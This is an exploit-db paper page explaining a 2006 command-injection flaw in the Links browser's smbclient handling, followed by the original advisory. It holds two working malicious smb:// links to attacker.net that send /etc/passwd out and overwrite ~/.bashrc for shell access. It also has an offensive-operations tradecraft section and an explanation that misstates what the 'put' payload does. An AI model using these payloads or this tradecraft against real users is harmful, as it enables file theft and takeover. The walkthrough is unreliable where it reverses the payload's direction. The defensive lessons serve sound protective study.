By exploitdb papers bot•November 14, 2006•
papers
Exploiting Links Browser's SMB Handling for Remote Code Execution
Exploiting Links Browser's SMB Handling for Remote Code Execution
What this paper is
This paper details a vulnerability in the Links web browser (specifically version 1.00pre12) that allows a malicious website to execute arbitrary commands on a user's system. The vulnerability is triggered when a user clicks on a specially crafted smb:// URL. This URL can be used to read files from or write files to the victim's machine, provided the user running the Links browser has the necessary permissions.
Simple technical breakdown
The Links browser has a feature to handle smb:// URLs, which are meant for accessing Windows network shares. When it encounters such a URL, it uses the smbclient command-line utility to interact with the specified share.
The vulnerability lies in how Links constructs the command passed to smbclient. It doesn't properly sanitize or escape special characters within the URL. This allows an attacker to inject shell commands directly into the smbclient command string. By carefully crafting the URL, an attacker can trick smbclient into executing arbitrary commands, effectively gaining code execution on the victim's machine.
Complete code and payload walkthrough
The provided paper highlights a specific section of the smb.c file within the Links browser's source code and then presents example HTML links.
Vulnerable Code Snippet Analysis (smb.c)
The core of the vulnerability is in the smb_func() function. Let's break down the relevant lines:
...
143 if (*share) { // Checks if a share name is present in the URL
144 if (!*dir || dir[strlen(dir) - 1] == '/'
|| dir[strlen(dir) - 1] == '\\') { // Checks if 'dir' is empty or ends with a path separator
145 if (dir) { // If 'dir' is not empty
146 v[n++] = "-D"; // Argument for smbclient: specify directory
147 v[n++] = dir; // The directory path
148 }
149 v[n++] = "-c"; // Argument for smbclient: execute a command
150 v[n++] = "ls"; // The command to execute: 'ls'
151 } else { // If 'dir' is not empty and does not end with a separator
152 unsigned char *ss; // Temporary pointer for string manipulation
153 unsigned char *s = stracpy("get \""); // Start building a command string, prepending "get \""
'dir' is the directory part of the smb://.. url:
154 add_to_strn(&s, dir); // Append the 'dir' part of the URL to the command string
155 add_to_strn(&s, "\" -"); // Append "\" -" to the command string
156 while ((ss = strchr(s, '/'))) // Replace all '/' characters with '\'
*ss = '\\';
157 v[n++] = "-c"; // Argument for smbclient: execute a command
158 v[n++] = s; // The constructed command string
159 }
160 }
161 v[n++] = NULL; // Null terminator for the argument vector
smbclient is executed:
162 execvp("smbclient", (char **)v); // Execute smbclient with the constructed arguments
163 fprintf(stderr, "smbclient not found in $PATH"); // Error message if smbclient is not found
164 _exit(1); // Exit with an error code
...Explanation of Code Blocks and Payload Segments:
Lines 143-161 (Argument Construction): This block builds the argument list (
v) that will be passed toexecvpfor executingsmbclient.if (*share): Ensures there's a network share specified.if (!*dir || dir[strlen(dir) - 1] == '/' || dir[strlen(dir) - 1] == '\\'): This condition handles cases where the URL specifies a directory that is either empty or ends with a slash. In this scenario,smbclientis instructed to runlsin that directory.else: This is the crucial part for the exploit. If thedirpart of the URL is not empty and doesn't end with a separator, Links constructs a command string.unsigned char *s = stracpy("get \"");: Initializes a stringswith"get \".add_to_strn(&s, dir);: Appends thedircomponent from thesmb://URL.add_to_strn(&s, "\" -");: Appends" -".while ((ss = strchr(s, '/'))) *ss = '\\';: This loop replaces all forward slashes (/) in the constructed string with backslashes (\). This is likely to make the path compatible with Windows SMB shares.v[n++] = "-c"; v[n++] = s;: The constructed stringsis passed as the command tosmbclientusing the-coption.
Line 162 (
execvp("smbclient", (char **)v);): This is where thesmbclientcommand is actually executed with the arguments prepared in thevarray. Theexecvpfunction searches forsmbclientin the system's PATH.
Example HTML Links Analysis
The HTML links demonstrate how an attacker can leverage the vulnerability by injecting shell metacharacters (like ;, |, &, etc.) and command execution directives into the dir part of the smb:// URL.
Example 1: Get .bashrc
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd home; lcd teemu; get HOHO .bashrc; exit; '>Get .bashrc</a>- URL Structure:
smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd home; lcd teemu; get HOHO .bashrc; exit; - Breakdown:
smb://attacker.net/work/XXX": This part is interpreted by Links. The"character is crucial. It prematurely closes the quoteddirargument thatsmbclientexpects.YYY;: This is likely a placeholder or part of the attacker's crafted string. The semicolon;is a shell command separator.lcd ..; lcd ..; lcd ..; lcd home; lcd teemu;: These aresmbclientcommands.lcdchanges the local directory. The attacker is navigating up the directory tree multiple times and then into specific directories (home,teemu) on the victim's local filesystem (or whereversmbclientis configured to operate locally).get HOHO .bashrc;: This is the core malicious command. It tellssmbclientto download a file namedHOHOfrom the remote SMB share (which the attacker controls) and save it as.bashrcon the victim's machine.exit;: Exitssmbclient.
- Practical Purpose: This link aims to overwrite the victim's
.bashrcfile. If the victim's user has shell access and.bashrcis executed upon login, this could lead to remote code execution for the attacker.
Example 2: Put /etc/passwd
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; '>Put /etc/passwd</a>- URL Structure:
smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; - Breakdown:
smb://attacker.net/work/XXX": Similar to the above, the"closes thedirargument.YYY;: Placeholder.lcd ..; lcd ..; lcd ..; lcd etc;: The attacker navigates the local filesystem of the victim to the/etc/directory.put passwd ;: This command attempts to upload a file namedpasswdfrom the attacker's controlled SMB share to the victim's current local directory (/etc/).exit;: Exitssmbclient.
- Practical Purpose: This link aims to upload a file named
passwd(presumably controlled by the attacker and potentially containing malicious content or a backdoor) into the/etc/directory on the victim's machine. If the attacker can then trigger the execution of this uploaded file, it could lead to code execution.
Mapping List:
smb://attacker.net/work/XXX": The initial part of the URL, whereXXX"is crafted to terminate thedirargument prematurely.YYY;: A placeholder, followed by a shell command separator.lcd ..; lcd ..; lcd ..;:smbclientcommands to change the local directory upwards multiple times.lcd home; lcd teemu;(Example 1) /lcd etc;(Example 2):smbclientcommands to change the local directory to a specific target location.get HOHO .bashrc;(Example 1):smbclientcommand to download a file from the attacker's share and save it locally.put passwd ;(Example 2):smbclientcommand to upload a file from the attacker's share to the local filesystem.exit;:smbclientcommand to terminate the session."(within the URL): The critical character that breaks out of the intendeddirargument parsing.;(within the URL): Shell command separator, allowing sequential execution ofsmbclientcommands and potentially other shell commands if the context allowed.
Shellcode/Payload Segments:
There is no explicit shellcode in the traditional sense (byte sequences to be injected). Instead, the "payload" is the crafted URL itself, which, when processed by Links and smbclient, results in the execution of smbclient commands that achieve the attacker's goals. The commands (lcd, get, put, exit) are interpreted by smbclient.
Practical details for offensive operations teams
- Required Access Level: User-level access to a machine running a vulnerable version of the Links browser. The attacker does not need administrative privileges, only the ability to trick a user into clicking a link.
- Lab Preconditions:
- A controlled SMB server accessible by the victim. This server will host the files the attacker wants to
getorput. - A victim machine with Links 1.00pre12 (or a similarly vulnerable version) and
smbclientinstalled. - Network connectivity between the victim and the attacker's SMB server.
- The victim must be able to resolve the attacker's domain name (
attacker.netin the example).
- A controlled SMB server accessible by the victim. This server will host the files the attacker wants to
- Tooling Assumptions:
- A web server to host the malicious HTML page.
- An SMB server (e.g., Samba on Linux, or a Windows file share) to serve malicious files and receive uploaded files.
- A way to deliver the malicious link to the victim (e.g., email, social engineering).
- Execution Pitfalls:
- Links Version: The exploit is specific to older versions of Links. Modern versions are likely patched.
smbclientAvailability:smbclientmust be installed on the victim's system and be in the user's PATH forexecvpto find it.- Network Restrictions: Firewalls might block SMB traffic (ports 139, 445).
- Permissions: The exploit relies on the privileges of the user running Links. The attacker can only read/write files that the user has access to. Uploading to
/etc/might fail if the user doesn't have write permissions there. - User Interaction: The victim must actively click the malicious link.
- SMB Server Control: The attacker needs to control the SMB server to serve the correct files for
getoperations and to receive files duringputoperations. - URL Encoding: Special characters in the URL might need URL encoding, although the exploit relies on unencoded characters to break out of parsing.
- Tradecraft Considerations:
- Social Engineering: This exploit heavily relies on social engineering to get the victim to click the link.
- Stealth: The primary telemetry would be the
smbclientprocess execution, which might be logged by endpoint detection systems. The network traffic to the attacker's SMB server is also a strong indicator. - Payload Delivery: If the goal is to gain a persistent shell, overwriting
.bashrcor similar user profile scripts is a common technique. Uploading a backdoor executable to a user-writable directory and then finding a way to execute it would be another.
Where this was used and when
This vulnerability was published in November 2006. At that time, the Links browser was in use, and smbclient was a common utility on Linux systems for interacting with Windows shares. Exploits of this nature were more prevalent before stricter input sanitization and security awareness became widespread. It's unlikely this specific exploit vector would be effective against modern, patched systems without significant modifications.
Defensive lessons for modern teams
- Input Sanitization: Always sanitize user-provided input, especially when it's used in constructing commands or file paths. This includes URL components.
- Principle of Least Privilege: Users should only have the necessary permissions to perform their tasks. This limits the impact of privilege escalation or unauthorized file access.
- Endpoint Detection and Response (EDR): Monitor for suspicious process executions, particularly
smbclientbeing invoked with unusual command-line arguments or from unexpected parent processes (like a web browser). - Network Monitoring: Monitor outbound SMB traffic to unusual destinations or from unexpected sources.
- Browser Security: Keep browsers updated to the latest versions, as they often contain patches for such vulnerabilities.
- User Awareness Training: Educate users about the dangers of clicking on suspicious links, especially those involving unfamiliar protocols like
smb://. - Application Whitelisting: Restrict which applications can be executed on endpoints.
ASCII visual (if applicable)
This exploit doesn't lend itself to a complex architectural diagram. The core interaction is between the user's browser and the smbclient utility.
+-----------------+ +-----------------+ +-----------------+
| User Clicks URL | ----> | Links Browser | ----> | smbclient |
| (Malicious HTML)| | (Vulnerable) | | (Exploited) |
+-----------------+ +-----------------+ +-----------------+
|
v
+-----------------+
| Victim's System |
| (File Access / |
| Command Exec) |
+-----------------+
|
v
+-----------------+
| Attacker's SMB |
| Server |
+-----------------+Explanation:
- The user interacts with a web page containing a malicious link.
- The Links browser, upon encountering the
smb://URL, attempts to process it. - Due to a flaw in handling the URL's directory component, Links constructs and executes a command for
smbclient. smbclientthen interacts with the victim's system (reading/writing files) or the attacker's SMB server, depending on the crafted command.
Source references
- Paper ID: 2784
- Paper Title: Links 1.00pre12 - 'smbclient' Remote Code Execution
- Author: Teemu Salmela
- Published: 2006-11-14
- Paper URL: https://www.exploit-db.com/papers/2784
- Raw URL: https://www.exploit-db.com/raw/2784
Original Exploit-DB Content (Verbatim)
<!--
Links smbclient command execution
-----------------------------------------------------------------------------
There is a flaw in the Links web browser, that allows malicious web sites to
execute smbclient commands on the victim's machine. This flaw makes it
possible to read any file from the victim system (any file that the user
running links has read access), or to upload any file to the victim system
(any file that the user running links can create/overwrite). The attacker
could, for example, upload ~/.bashrc to gain shell access.
Version numbers:
-----------------------------------------------------------------------------
I tested this on Ubuntu 6.06 LTS and Links 1.00pre12. Smbclient must also
be installed.
Vulnerable code:
-----------------------------------------------------------------------------
smb_func() in smb.c:
...
143 if (*share) {
144 if (!*dir || dir[strlen(dir) - 1] == '/'
|| dir[strlen(dir) - 1] == '\\') {
145 if (dir) {
146 v[n++] = "-D";
147 v[n++] = dir;
148 }
149 v[n++] = "-c";
150 v[n++] = "ls";
151 } else {
152 unsigned char *ss;
153 unsigned char *s = stracpy("get
\"");
'dir' is the directory part of the smb://.. url:
154 add_to_strn(&s, dir);
155 add_to_strn(&s, "\" -");
156 while ((ss = strchr(s, '/')))
*ss = '\\';
157 v[n++] = "-c";
158 v[n++] = s;
159 }
160 }
161 v[n++] = NULL;
smbclient is executed:
162 execvp("smbclient", (char **)v);
163 fprintf(stderr, "smbclient not found in $PATH");
164 _exit(1);
...
-->
<html>
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; '>Put /etc/passwd</a>
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd home; lcd teemu; get HOHO .bashrc; exit; '>Get .bashrc</a>
</html>
# milw0rm.com [2006-11-14]